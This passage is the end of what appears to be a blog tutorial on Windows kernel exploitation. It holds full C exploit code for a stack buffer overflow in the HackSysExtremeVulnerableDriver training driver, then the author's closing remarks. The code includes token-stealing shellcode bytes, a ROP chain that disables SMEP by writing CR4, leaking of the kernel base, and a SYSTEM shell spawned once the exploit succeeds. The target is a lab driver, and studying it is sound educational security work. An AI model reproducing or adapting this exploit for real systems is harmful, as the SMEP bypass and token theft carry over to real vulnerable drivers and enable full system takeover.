	0x8B, 0x88, 0xE0, 0x02, 0x00, 0x00, 0x48, 0x83, 0xF9, 0x04, 0x75, 0xE6,
	0x48, 0x8B, 0x88, 0x48, 0x03, 0x00, 0x00, 0x80, 0xE1, 0xF0, 0x48, 0x89,
	0x8B, 0x48, 0x03, 0x00, 0x00, 0x41, 0xBC, 0x00, 0x00, 0x00, 0x00, 0x49,
	0x89, 0xEE, 0x49, 0x81, 0xC6, 0xD0, 0x00, 0x00, 0x00, 0x4D, 0x89, 0xF7,
	0x4D, 0x8B, 0x7F, 0x30, 0x48, 0x83, 0xC4, 0x10, 0x59, 0x5B, 0x58, 0xC3
};


INT TriggerExploit(HANDLE hDevice);
UINT64 GetKernelBaseAddress();

INT main() 
{
    HANDLE hDevice;
    PCWSTR lpDeviceName = L"\\\\.\\HackSysExtremeVulnerableDriver";

    printf("[*] Author: @stolenfootball\n");
    printf("[*] Website: https://stolenfootball.github.io\n\n");

    hDevice = CreateFileW(
        lpDeviceName,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open handle to driver: %lu\n", GetLastError());
        return -1;
    } 

    printf("[+] Device opened successfully!\n");

    if (TriggerExploit(hDevice) >= 0) {
        printf("[+] Spawning shell with SYSTEM privliges...\n");
        system("cmd");
    } else {
        printf("[-] Exploit failed: %lu\n", GetLastError());
    }

    printf("[+] Cleaning up and closing handle...\n");
    CloseHandle(hDevice);

    return 0;
}

INT TriggerExploit(HANDLE hDevice) 
{
    UINT64 *lpInBuffer;
    LPVOID  lpShellcode;
    UINT64  kernelBase;
    SIZE_T  inBufferSize;
    SIZE_T  returnAddrIndex;
    DWORD   bytesReturned;
    SIZE_T  shellcodeSize = sizeof(TokenStealingPayloadWin8);


    // Allocate space for the shellcode
    printf("[+] Allocating executable memory for shellcode\n");

    if (!(lpShellcode = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE))) {
        printf("[-] Failed to allocate memory for shellcode: %lu\n", GetLastError());
        return -1;
    }

    // Copy shellcode into executable user space memory
    RtlCopyMemory(lpShellcode, TokenStealingPayloadWin8, shellcodeSize);

    printf("[+] Shellcode copied into executable memory\n");


    // Allocate a buffer of the correct size for the overflow.  Need to overflow 
    // the buffer, three callee saved registers, and enough space for the ROP chain.
    inBufferSize = BUFFER_SIZE + (3 * POINTER_SIZE) + CHAIN_SIZE;
    
    // Alocate the user buffer to be sent to the driver
    if (!(lpInBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, inBufferSize))) {
        printf("[-] Failed to allocate memory for buffer: %lu\n", GetLastError());
        return -1;
    }
    printf("[+] Created buffer of size: %zu\n", inBufferSize);
    

    // Set buffer to be full of 'A's
    RtlFillMemory(lpInBuffer, inBufferSize, 'A');


    // Create the ROP Chain
    if (!(kernelBase = GetKernelBaseAddress())) {
        printf("[-] Failed to calculate kernel base\n");
        return -1;
    }

    // Return address is at the buffer size plus the size of the three callee saved registers to 
    // overwrite plus the size of the return address.  Since the array is of size UINT64, we need
    // to divide by 8 to get the correct index into the array from the raw size in bytes, then 
    // subtract one to account for zero indexing.
    returnAddrIndex = ((BUFFER_SIZE + (3 * POINTER_SIZE) + POINTER_SIZE) / POINTER_SIZE) - 1;

    lpInBuffer[returnAddrIndex++] = POP_RCX + kernelBase;
    lpInBuffer[returnAddrIndex++] = CR4_SMEP_DISABLED;
    lpInBuffer[returnAddrIndex++] = MOV_CR4_RCX + kernelBase;
    lpInBuffer[returnAddrIndex++] = (UINT64)lpShellcode;


    printf("[+] Sending buffer with IOCTL: 0x%x\n", HEVD_IOCTL_BUFFER_OVERFLOW);
    BOOL result = DeviceIoControl(
        hDevice,
        HEVD_IOCTL_BUFFER_OVERFLOW,
        lpInBuffer,
        inBufferSize,
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    if (!result) {
        printf("[-] Failed to send IOCTL to HEVD Driver: %lu\n", GetLastError());
        return -1;
    }

    printf("[+] IOCTL sent successfully to HEVD driver!\n");

    printf("[+] Freeing input buffer...\n");
    HeapFree(GetProcessHeap(), 0, lpInBuffer);

    return 0;
}

UINT64 GetKernelBaseAddress() 
{
    ULONG_PTR  pKernelBaseAddress = 0;
    LPVOID    *lpImageBase = NULL;
    DWORD      dwBytesNeeded = 0;

    if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) {
        printf("[-] Failed to retrieve size needed for device driver entries\n");
        return -1;
    }

    if (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) {
        printf("[-] Failed to allocate space for lpImageBase\n");
        if (lpImageBase) 
            HeapFree(GetProcessHeap(), 0, lpImageBase);
        return -1;
    }

    if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) {
        printf("[-] EnumDeviceDrivers failed: %d", GetLastError());
        if (lpImageBase) 
             HeapFree(GetProcessHeap(), 0, lpImageBase);
        return -1;
    }

    pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[0];
    HeapFree(GetProcessHeap(), 0, lpImageBase);

    printf("[+] Kernel Base Address calculated: %llx\n", pKernelBaseAddress);

    return (UINT64)pKernelBaseAddress;
}

As always, this can also be found on Github.

Final thoughts

That was a long post (and significantly more technical than the previous ones), but hopefully you were able to learn something from it. The next post will be about bypassing VBS, the newest mitigation for local kernel exploitation. Once you can do that, you can start writing exploits for brand new Windows 11 systems.

I’m starting a new job soon so I’m not sure when I’m going to have a chance to post next. I highly recommend reading through some of the writeups linked on the HEVD Github if you want to continue in the meantime.

Thanks for sticking with me so far, hope to see you again in the future!